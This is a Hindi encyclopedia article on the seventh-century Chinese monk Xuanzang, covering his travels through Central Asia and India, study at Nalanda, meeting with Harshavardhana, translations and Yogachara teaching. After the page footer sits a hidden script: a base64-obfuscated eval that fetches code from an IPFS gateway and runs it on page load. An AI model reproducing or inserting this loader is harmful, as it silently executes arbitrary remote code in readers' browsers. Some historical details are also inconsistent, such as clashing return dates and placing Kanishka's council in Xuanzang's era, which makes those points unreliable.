ह्वेन त्सांग

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

ह्वेन त्सांग / युवानच्वांग

ह्वेन त्सांग
Xuanzang

ह्वेन त्सांग / ह्वेन सांग / युवान चांग या युआन-त्यांग (संस्कृत मोक्षदेव) जन्म: 602 ई. लगभग मृत्यु: 664 ई. लगभग

मेम त्रिपिटक के रूप में ज्ञात ह्वेन त्सांग एक प्रसिद्ध चीनी बौद्ध भिक्षु का जन्म चीन के लुओयंग स्थान पर सन 602 ई. में हुआ था। इसके साथ ही वह एक स्कॉलर, घुमक्कड़ और अनुवादक भी था। उनका मूल नाम चेन आई था। ह्वेन त्सांग, जिन्हें मानद उपाधि सान-त्सांग से सुशोभित किया गया। उन्हें मू-चा ति-पो भी कहा जाता है। जिन्होंने बौद्ध धर्मग्रंथों का संस्कृत से चीनी अनुवाद किया और चीन में बौद्ध चेतना मत की स्थापना की। इसने ही भारत और चीन के बीच आरम्भिक तंग वंश काल में समन्वय किया था।

ह्वेन त्सांग चार बच्चों में सबसे छोटा था। इसके प्रपितामह राजधानी के शाही महाविद्यालय में 'निरीक्षक' थे, और पितामह प्राध्यापक थे। इसके पिता एक कन्फ़्यूशस वादी थे, जिन्होंने अपनी राजसी नौकरी त्याग कर राजनीतिक उठापलट, जो कि चीन में कुछ समय बाद होने वाला था, से अपने को बचाया।

शिक्षा व अध्ययन

विद्वानों की पीढ़ियों वाले परिवार में जन्मे ह्वेन त्सांग ने प्राचीन कन्फ़्यूशियाई शिक्षा प्राप्त की। इसकी जीवनियों के अनुसार, यह प्रतिभाशाली छात्र रहे। इसके पिता के कन्फ़्यूशस वादी होने के बावजूद भी शुरूआती काल से ही इसने बौद्ध भिक्षु बनने की इच्छा व्यक्त की थी। इसके एक बड़े भ्राता ने ऐसा ही किया था। यहीं एक बुद्धिमान प्रज्ञावान बौद्ध भिक्षु के साथ दो वर्ष व्यतीत किये लेकिन अपने एक बड़े भाई के प्रभाव में बौद्ध धर्मग्रंथों के प्रति उनकी रूचि जागी और उन्होंने शीघ्र ही बौद्ध धर्म ग्रहण कर लिया। चीन में उस समय जारी राजनीतिक उथल-पुथल से बचने के लिए अपने भाई के साथ उन्होंने चांग-अन बाद में सू-चूआन (आधुनिक सेच्वान) की यात्रा की। सू-चूआन में ह्वेन त्सांग ने बौद्ध दर्शन का अध्ययन शुरू किया, लेकिन शीघ्र ही मूल ग्रंथ में कई विसंगतियों एवं विरोधाभासों से परेशान हो गए। अपने चीनी गुरुओं से कोई समाधान न मिलने पर उन्होंने बौद्ध धर्म के स्त्रोत भारत में जाकर अध्ययन करने का फ़ैसला किया। यात्रा अनुमति पत्र हासिल न कर पाने के कारण उन्होंने चोरी-छिपे सू-चुआन छोड़ दिया।

उसने यहाँ थेरवड़ा लेखों का अध्ययन किया।

यात्रा

इसने भारत की सत्रह वर्ष यात्रा की और वापस चीन गया और अपनी आत्मकथा और अन्य पुस्तकों में यहाँ के ब्यौरे दिये हैं, जो काफ़ी रोचक और ऐतिहासिक दृष्टि से शिक्षाप्रद है। इसके कई नाम प्रचलित हैं, जो कि चीन के अलग अलग प्रांतों की बोली के अनुसार हैं।

इसी काल में चौथी बौद्ध सम्मेलन हुआ, कुषाण राजा कनिष्क की देख रेख में। सन 633 ई. में ह्वेन त्सांग ने कश्मीर से दक्षिण की ओर चिनाभुक्ति जिसे वर्तमान में फ़िरोज़पुर कहते हैं, को प्रस्थान किया। वहाँ भिक्षु विनीतप्रभा के साथ एक वर्ष तक अध्ययन किया। सन् 634 ई. में पूर्व में जालंधर पहुँचा। इससे पूर्व उसने कुल्लू घाटी में हीनयान के मठ भी भ्रमण किये। फिर वहाँ से दक्षिण में बैरत, मेरठ और मथुरा की यात्रा की।

अपनी यात्रा के दौरान ह्वेन त्सांग तकला माकान रेगिस्तान के उत्तर से गुज़रे। ह्वेन त्सांग तुरफ़ान, काराशर, कुच, ताराकंद और समरक़ंद जैसे नख़लिस्तान केंद्रों से होते हुए लौह दरवाज़े (आयरन गेट) से आगे बैक्ट्रिया में, फिर हिंदकुश पार करते हुए कपिशा, गांधार और अंततः पश्चिमोत्तर भारत से कश्मीर पहुंचे। वहाँ से वह गंगा नदी में नौका से मथुरा पहुँचे और उसके बाद गंगा के पूर्वी इलाक़े में बौद्ध धर्म की पवित्र भूमि में 633 ई. में पहुँचे। फिर गंगा नदी पार करके दक्षिण में संकस्य (कपित्थ) पहुँचा, जहाँ कहते हैं, कि गौतम बुद्ध स्वर्ग से अवतरित हुए थे। यमुना के तीरे चलते-चलते ह्वेन त्सांग मथुरा पहुँचा। मथुरा में 2000 भिक्षु मिले और हिन्दू बहुल क्षेत्र होने के बाद भी दोनों ही बौद्ध शाखाएँ वहाँ थीं। उसने श्रुघ्न नदी तक यात्रा की और फिर पूर्ववत मतिपुर के लिये नदी पार की। यह सन् 635 ई. की बात है।

वहाँ से उत्तरी भारत के महासम्राट हर्षवर्धन (606-647 ई.) की राजधानी 'कान्यकुब्ज', वर्तमान कन्नौज पहुँचा। यहाँ सन 636 ई. में उसने सौ मठ और 10,000 भिक्षु देखें (महायान और हीनयान, दोनों ही)। वह सम्राट की बौद्ध धर्म की संरक्षण और पालन से अति प्रभावित हुआ। इसने क़रीब 10 वर्षो तक भारत में भ्रमण किया। उसने 6 वर्षो तक नालन्दा विश्वविद्यालय में अध्ययन किया। उसकी भारत यात्रा का वृतान्त 'सी-यू-की' नामक ग्रंथ से जाना जाता है जिसने लगभग 138 देशों के यात्रा विवरण का ज़िक्र मिलता है। 'हूली' ह्वेन त्सांग का मित्र था जिसने ह्वेन त्सांग की जीवनी लिखी। इस जीवनी में उसने तत्कालीन भारत पर भी प्रकाश डाला। चीनी यात्रियों में सर्वाधिक महत्त्व ह्वेन त्सांग का ही है। उसे ‘प्रिंस ऑफ पिलग्रिम्स‘ अर्थात् यात्रियों का राजकुमार कहा जाता हैं।

भारत में ह्वेन त्सांग ने बुद्ध के जीवन से जुड़े सभी पवित्र स्थलों का भ्रमण किया और उपमहाद्वीप के पूर्व एवं पश्चिम से लगे इलाक़ो की भी यात्रा की। उन्होंने अपना अधिकांश समय नालंदा मठ में बिताया, जो बौद्ध शिक्षा का प्रमुख केंद्र था, जहाँ उन्होंने संस्कृत, बौद्ध दर्शन एवं भारतीय चिंतन में दक्षता हासिल की।

भारत में सम्मान

जब ह्वेन त्सांग भारत में थे, तो एक विद्वान के रूप में ह्वेन त्सांग की ख्याति इतनी फैली की उत्तर भारत के शासक शक्तिशाली राजा हर्षवर्धन ने भी उनसे मिलना एवं उन्हें सम्मानित करना चाहा। इस राजा के संरक्षण के कारण, 643 ई. में ह्वेन त्सांग की वापसी चीन यात्रा काफ़ी सुविधाजनक रही। उनकी ख्याति मुख्य रूप से बौद्ध सूत्रों के अनुवाद की व्यापकता एवं भिन्नता तथा मध्य एशिया और भारत की यात्रा के दस्तावेज़ों के कारण है, जो विस्तृत एवं सटीक आंकड़ों के कारण इतिहासकारों एवं पुरातत्त्वविदोम के लिए अमूल्य हैं।

राजधानी में वापसी

ह्वेन त्सांग, तांग की राजधानी चांग-अन में 16 साल के बाद 645 ई. में लौटे। राजधानी में ह्वेन त्सांग का भव्य स्वागत हुआ और कुछ दिनों बाद शहंशाह ने उन्हें दरबार में बुलाया, जो विदेशी भूमि के उनके वृतांत से इतने रोमांचित हुए कि उन्होंने इस बौद्ध भिक्षु को मंत्री पद का प्रस्ताव दिया। लेकिन ह्वेन त्सांग ने धर्म की सेवा को प्राथमिकता दी, इसलिए उन्होंने सम्मानपूर्वक शाही प्रस्ताव को अस्वीकार कर दिया।

बौद्ध धर्म का प्रचार

ह्वेन त्सांग ने अपना शेष जीवन बौद्ध धर्मग्रंथों के अनुवाद में लगा दिया जो 657 ग्रंथ थे और 520 पेटियों में भारत से लाए गए थे। इस विशाल खंड के केवल छोटे से हिस्से (1330 अध्यायों में क़रीब 73 ग्रंथ) के ही अनुवाद में महायान के कुछ अत्यधिक महत्त्वपूर्ण ग्रंथ शामिल हैं।

मृत्यु

ह्वेन त्सांग की मृत्यु 5 फ़रवरी, 664 ई. में हुई थी।

योगाचार में रुचि

ह्वेन त्सांग की रूचि मुख्यतः योगाचार (विज्ञानवाद) दर्शन पर केंद्रित थी तथा वह और उनके शिष्य क्वी-ची (632-682) ने चीन में वी-शिह (एकमात्र चेतना मत) की स्थापना की। इसका सिद्धांत ह्वेन त्सांग के चेंग-वे-शिह लुन (चेतना मात्र सिद्धांत की स्थापना पर शोध निबंध) में प्रतिपादित है, जो मुख्य योगाचार लेखों का अनुवाद एवं क्वी-ची की व्याख्या है। इस मत की मुख्य अवधारणा है:-

पूरा विश्व केवल मन की प्रतिच्छवि है।

जब ह्वेन त्सांग एवं क्वी-ची जीवित रहे, इस मत को कुछ प्रतिष्ठा और लोकप्रियता मिली, लेकिन इसका जटिल प्रदर्शन, गूढ़ शब्दावली तथा मन और इंद्रियों का बाल की खाल निकालने वाला विश्लेषण, चीनी परंपरा के लिए नया था। इसलिए इन दोनों हस्तियों की मृत्यु के बाद इस मत का तेजी से ह्रास हुआ। लेकिन ऐसा होने से पहले जापान के एक भिक्षु दोशो, ह्वेन त्सांग से शिक्षा के लिए 653 में चीन आए और अध्ययन पूरा करने के बाद जापान लौटने के बाद उन्होंने ‘मात्र उद्-भावना’ मत की स्थापना की। सातवीं और आठवीं सदी के दौरान यह मत, जापानी जिसे होसो कहते थे, जापान के सभी बौद्ध मतों में सबसे प्रभावशाली बन गया।

व्यापक वृत्तांत

अनुवाद के अलावा ह्वेन त्सांग ने ता-तांग सी-यू-ची ( महान तांग राजवंश के पश्चिमी क्षेत्र का दस्तावेज़) भी लिखा। यह उन देशों का व्यापक वृत्तांत है, जहां से वह अपनी यात्रा के दौरान गुज़रे थे। इस निर्भीक एवं समर्पित बौद्ध भिक्षु और तीर्थयात्री के सम्मान में तांग सम्राट ने ह्वेन त्सांग की मृत्यु के बाद तीन दिन तक सभी सभाएँ रद्द कर दीं।

ह्वेन त्सांग के बारे में दो अध्ययन हैं:-

  • आर्थर वेली का द रियल त्रिपिटिक पृष्ठ 11-130 (1952),
  • एक जीवंत और रोचक शैली में लिखी जीवनी तथा रेने ग्रुसेट द्वारा लिखी अपेक्षाकृत व्यापक जीवनी सर लेस ट्रेसेज़ द बुद्धा (1929; इन द फुटस्टेप्स ऑफ़ द बुद्धा), जिसमें तांग इतिहास और बौद्ध दर्शन की पृष्ठभूमि में इस चीनी तीर्थयात्री के जीवन की चर्चा की गई हैं।


टीका टिप्पणी और संदर्भ


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>